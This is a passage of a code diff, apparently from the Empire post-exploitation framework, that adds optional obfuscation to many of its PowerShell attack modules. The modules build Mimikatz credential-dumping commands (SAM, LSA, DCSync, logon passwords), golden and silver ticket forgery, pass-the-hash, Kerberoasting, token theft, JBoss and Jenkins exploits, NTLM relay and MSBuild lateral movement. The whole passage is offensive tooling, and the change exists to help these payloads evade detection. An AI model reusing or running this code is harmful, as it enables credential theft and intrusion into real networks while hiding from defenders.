moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-CredentialInjection.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -109,7 +111,7 @@ class Module:
script = moduleCode
script += "Invoke-CredentialInjection"
scriptEnd = "Invoke-CredentialInjection"
if self.options["NewWinLogon"]['Value'] == "" and self.options["ExistingWinLogon"]['Value'] == "":
print helpers.color("[!] Either NewWinLogon or ExistingWinLogon must be specified")
@ -145,8 +147,10 @@ class Module:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

16
lib/modules/powershell/credentials/enum_cred_store.py
View File

@ -37,12 +37,14 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
scriptPath = self.mainMenu.installPath + "/data/module_source/credentials/dumpCredStore.ps1"
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/dumpCredStore.ps1"
scriptCmd = "Invoke-X"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(scriptPath, 'r')
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Unable to open script at the configured path: " + str(scriptPath))
return ""
@ -50,6 +52,8 @@ class Module:
script = f.read()
f.close()
script += "\n%s" %(scriptCmd)
scriptEnd = "\n%s" %(scriptCmd)
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

18
lib/modules/powershell/credentials/invoke_kerberoast.py
View File

@ -92,13 +92,15 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info['Name']
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Kerberoast.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -109,17 +111,19 @@ class Module:
f.close()
script = moduleCode
script += "\nInvoke-Kerberoast "
scriptEnd = "\nInvoke-Kerberoast "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
script += '| fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += '| fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

15
lib/modules/powershell/credentials/mimikatz/cache.py
View File

@ -53,11 +53,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -69,8 +71,11 @@ class Module:
script = moduleCode
script += "Invoke-Mimikatz -Command "
script += "'\"token::elevate\" \"lsadump::cache\" \"token::revert\"';"
scriptEnd = "Invoke-Mimikatz -Command "
scriptEnd += "'\"token::elevate\" \"lsadump::cache\" \"token::revert\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

12
lib/modules/powershell/credentials/mimikatz/certs.py
View File

@ -52,11 +52,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -69,6 +71,8 @@ class Module:
script = moduleCode
# add in the cert dumping command
script += """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"' """
scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"' """
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

14
lib/modules/powershell/credentials/mimikatz/command.py
View File

@ -57,11 +57,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -74,7 +76,9 @@ class Module:
script = moduleCode
# build the custom command with whatever options we want
script += "Invoke-Mimikatz -Command "
script += "'\"" + self.options['Command']['Value'] + "\"'"
scriptEnd = "Invoke-Mimikatz -Command "
scriptEnd += "'\"" + self.options['Command']['Value'] + "\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

20
lib/modules/powershell/credentials/mimikatz/dcsync.py
View File

@ -70,11 +70,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -86,16 +88,18 @@ class Module:
script = moduleCode
script += "Invoke-Mimikatz -Command "
scriptEnd = "Invoke-Mimikatz -Command "
script += "'\"lsadump::dcsync /user:" + self.options['user']['Value']
scriptEnd += "'\"lsadump::dcsync /user:" + self.options['user']['Value']
if self.options["domain"]['Value'] != "":
script += " /domain:" + self.options['domain']['Value']
scriptEnd += " /domain:" + self.options['domain']['Value']
if self.options["dc"]['Value'] != "":
script += " /dc:" + self.options['dc']['Value']
script += "\"';"
scriptEnd += " /dc:" + self.options['dc']['Value']
scriptEnd += "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

22
lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py
View File

@ -75,11 +75,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-DCSync.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -91,20 +93,22 @@ class Module:
script = moduleCode
script += "Invoke-DCSync -PWDumpFormat "
scriptEnd = "Invoke-DCSync -PWDumpFormat "
if self.options["Domain"]['Value'] != '':
script += " -Domain " + self.options['Domain']['Value']
scriptEnd += " -Domain " + self.options['Domain']['Value']
if self.options["Forest"]['Value'] != '':
script += " -DumpForest "
scriptEnd += " -DumpForest "
if self.options["Computers"]['Value'] != '':
script += " -GetComputers "
scriptEnd += " -GetComputers "
if self.options["Active"]['Value'] == '':
script += " -OnlyActive:$false "
script += "| Out-String;"
scriptEnd += " -OnlyActive:$false "
scriptEnd += "| Out-String;"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

12
lib/modules/powershell/credentials/mimikatz/extract_tickets.py
View File

@ -52,11 +52,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -68,6 +70,8 @@ class Module:
script = moduleCode
script += "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

16
lib/modules/powershell/credentials/mimikatz/golden_ticket.py
View File

@ -98,11 +98,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -139,13 +141,15 @@ class Module:
print helpers.color("[!] krbtgt hash not specified")
# build the golden ticket command
script += "Invoke-Mimikatz -Command '\"kerberos::golden"
scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::golden"
for option,values in self.options.iteritems():
if option.lower() != "agent" and option.lower() != "credid":
if values['Value'] and values['Value'] != '':
script += " /" + str(option) + ":" + str(values['Value'])
scriptEnd += " /" + str(option) + ":" + str(values['Value'])
script += " /ptt\"'"
scriptEnd += " /ptt\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

14
lib/modules/powershell/credentials/mimikatz/logonpasswords.py
View File

@ -52,11 +52,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -69,11 +71,13 @@ class Module:
script = moduleCode
# build the dump command with whatever options we want
script += "Invoke-Mimikatz;"
scriptEnd = "Invoke-Mimikatz -DumpCreds;"
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

18
lib/modules/powershell/credentials/mimikatz/lsadump.py
View File

@ -59,11 +59,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -75,13 +77,15 @@ class Module:
script = moduleCode
script += "Invoke-Mimikatz -Command "
scriptEnd = "Invoke-Mimikatz -Command "
if self.options['Username']['Value'] != '':
script += "'\"lsadump::lsa /inject /name:" + self.options['Username']['Value']
scriptEnd += "'\"lsadump::lsa /inject /name:" + self.options['Username']['Value']
else:
script += "'\"lsadump::lsa /patch"
script += "\"';"
scriptEnd += "'\"lsadump::lsa /patch"
scriptEnd += "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

28
lib/modules/powershell/credentials/mimikatz/mimitokens.py
View File

@ -87,11 +87,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -111,28 +113,30 @@ class Module:
script = moduleCode
script += "Invoke-Mimikatz -Command "
scriptEnd = "Invoke-Mimikatz -Command "
if revert.lower() == "true":
script += "'\"token::revert"
scriptEnd += "'\"token::revert"
else:
if listTokens.lower() == "true":
script += "'\"token::list"
scriptEnd += "'\"token::list"
elif elevate.lower() == "true":
script += "'\"token::elevate"
scriptEnd += "'\"token::elevate"
else:
print helpers.color("[!] list, elevate, or revert must be specified!")
return ""
if domainadmin.lower() == "true":
script += " /domainadmin"
scriptEnd += " /domainadmin"
elif admin.lower() == "true":
script += " /admin"
scriptEnd += " /admin"
elif user.lower() != "":
script += " /user:" + str(user)
scriptEnd += " /user:" + str(user)
elif processid.lower() != "":
script += " /id:" + str(processid)
script += "\"';"
scriptEnd += " /id:" + str(processid)
scriptEnd += "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

14
lib/modules/powershell/credentials/mimikatz/pth.py
View File

@ -75,11 +75,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -120,8 +122,10 @@ class Module:
command += " /ntlm:" + self.options["ntlm"]['Value']
# base64 encode the command to pass to Invoke-Mimikatz
script += "Invoke-Mimikatz -Command '\"" + command + "\"'"
scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"'"
script += ';"`nUse credentials/token to steal the token of the created PID."'
scriptEnd += ';"`nUse credentials/token to steal the token of the created PID."'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

12
lib/modules/powershell/credentials/mimikatz/purge.py
View File

@ -53,11 +53,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -70,6 +72,8 @@ class Module:
script = moduleCode
# set the purge command
script += "Invoke-Mimikatz -Command '\"kerberos::purge\"'"
scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::purge\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

14
lib/modules/powershell/credentials/mimikatz/sam.py
View File

@ -54,11 +54,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -70,8 +72,10 @@ class Module:
script = moduleCode
script += "Invoke-Mimikatz -Command "
script += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';"
scriptEnd = "Invoke-Mimikatz -Command "
scriptEnd += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

16
lib/modules/powershell/credentials/mimikatz/silver_ticket.py
View File

@ -98,11 +98,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -151,13 +153,15 @@ class Module:
return ""
# build the golden ticket command
script += "Invoke-Mimikatz -Command '\"kerberos::golden"
scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::golden"
for option,values in self.options.iteritems():
if option.lower() != "agent" and option.lower() != "credid":
if values['Value'] and values['Value'] != '':
script += " /" + str(option) + ":" + str(values['Value'])
scriptEnd += " /" + str(option) + ":" + str(values['Value'])
script += " /ptt\"'"
scriptEnd += " /ptt\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

16
lib/modules/powershell/credentials/mimikatz/trust_keys.py
View File

@ -57,11 +57,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -72,10 +74,12 @@ class Module:
f.close()
script = moduleCode
scriptEnd = ""
if self.options['Method']['Value'].lower() == "sekurlsa":
script += "Invoke-Mimikatz -Command '\"sekurlsa::trust\"'"
scriptEnd += "Invoke-Mimikatz -Command '\"sekurlsa::trust\"'"
else:
script += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'"
scriptEnd += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

12
lib/modules/powershell/credentials/powerdump.py
View File

@ -50,11 +50,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-PowerDump.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -66,6 +68,8 @@ class Module:
script = moduleCode
script += "Invoke-PowerDump"
scriptEnd = "Invoke-PowerDump"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

28
lib/modules/powershell/credentials/tokens.py
View File

@ -110,11 +110,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-TokenManipulation.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -126,14 +128,14 @@ class Module:
script = moduleCode
script += "Invoke-TokenManipulation"
scriptEnd = "Invoke-TokenManipulation"
if self.options['RevToSelf']['Value'].lower() == "true":
script += " -RevToSelf"
scriptEnd += " -RevToSelf"
elif self.options['WhoAmI']['Value'].lower() == "true":
script += " -WhoAmI"
scriptEnd += " -WhoAmI"
elif self.options['ShowAll']['Value'].lower() == "true":
script += " -ShowAll | Out-String"
scriptEnd += " -ShowAll | Out-String"
else:
for option,values in self.options.iteritems():
@ -141,16 +143,18 @@ class Module:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
# try to make the output look nice
if script.endswith("Invoke-TokenManipulation") or script.endswith("-ShowAll"):
script += "| Select-Object Domain, Username, ProcessId, IsElevated, TokenType | ft -autosize | Out-String"
scriptEnd += "| Select-Object Domain, Username, ProcessId, IsElevated, TokenType | ft -autosize | Out-String"
else:
script += "| Out-String"
scriptEnd += "| Out-String"
if self.options['RevToSelf']['Value'].lower() != "true":
script += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"'
scriptEnd += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

12
lib/modules/powershell/credentials/vault_credential.py
View File

@ -52,11 +52,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Get-VaultCredential.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -69,6 +71,8 @@ class Module:
script = moduleCode
script += "Get-VaultCredential"
scriptEnd = "Get-VaultCredential"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

15
lib/modules/powershell/exfiltration/egresscheck.py
View File

@ -87,11 +87,14 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exfil/Invoke-EgressCheck.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -104,7 +107,7 @@ class Module:
script = moduleCode
# Need to actually run the module that has been loaded
script += 'Invoke-EgressCheck'
scriptEnd = 'Invoke-EgressCheck'
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
@ -112,8 +115,10 @@ class Module:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " \"" + str(values['Value']) + "\""
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

16
lib/modules/powershell/exploitation/exploit_jboss.py
View File

@ -81,11 +81,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-JBoss.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -97,15 +99,17 @@ class Module:
script = moduleCode
script += "\nExploit-JBoss"
scriptEnd = "\nExploit-JBoss"
for option,values in self.options.iteritems():
if option.lower() != "agent" and option.lower() != "showall":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

20
lib/modules/powershell/exploitation/exploit_jenkins.py
View File

@ -66,11 +66,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -82,15 +84,17 @@ class Module:
script = moduleCode
script += "\nExploit-Jenkins"
script += " -Rhost "+str(self.options['Rhost']['Value'])
script += " -Port "+str(self.options['Port']['Value'])
scriptEnd = "\nExploit-Jenkins"
scriptEnd += " -Rhost "+str(self.options['Rhost']['Value'])
scriptEnd += " -Port "+str(self.options['Port']['Value'])
command = str(self.options['Cmd']['Value'])
# if the command contains spaces, wrap it in quotes before passing to ps script
if " " in command:
script += " -Cmd \"" + command + "\""
scriptEnd += " -Cmd \"" + command + "\""
else:
script += " -Cmd " + command
scriptEnd += " -Cmd " + command
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

22
lib/modules/powershell/lateral_movement/inveigh_relay.py
View File

@ -80,11 +80,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-InveighRelay.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -97,19 +99,21 @@ class Module:
script = moduleCode
# set defaults for Empire
script += "\n" + 'Invoke-InveighRelay -Tool "2" '
for option,values in self.options.iteritems():
scriptEnd = "\n" + 'Invoke-InveighRelay -Tool "2" '
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
if "," in str(values['Value']):
quoted = '"' + str(values['Value']).replace(',', '","') + '"'
script += " -" + str(option) + " " + quoted
scriptEnd += " -" + str(option) + " " + quoted
else:
script += " -" + str(option) + " \"" + str(values['Value']) + "\""
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

20
lib/modules/powershell/lateral_movement/invoke_executemsbuild.py
View File

@ -118,7 +118,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
@ -126,6 +126,9 @@ class Module:
proxyCreds = self.options['ProxyCreds']['Value']
moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-ExecuteMSBuild.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -136,7 +139,7 @@ class Module:
f.close()
script = moduleCode
script += "Invoke-ExecuteMSBuild"
scriptEnd = "Invoke-ExecuteMSBuild"
credID = self.options["CredID"]['Value']
if credID != "":
@ -169,16 +172,19 @@ class Module:
script = script.replace('LAUNCHER',launcher)
# add any arguments to the end execution of the script
script += " -ComputerName " + self.options['ComputerName']['Value']
scriptEnd += " -ComputerName " + self.options['ComputerName']['Value']
if self.options['UserName']['Value'] != "":
script += " -UserName \"" + self.options['UserName']['Value'] + "\" -Password \"" + self.options['Password']['Value'] + "\""
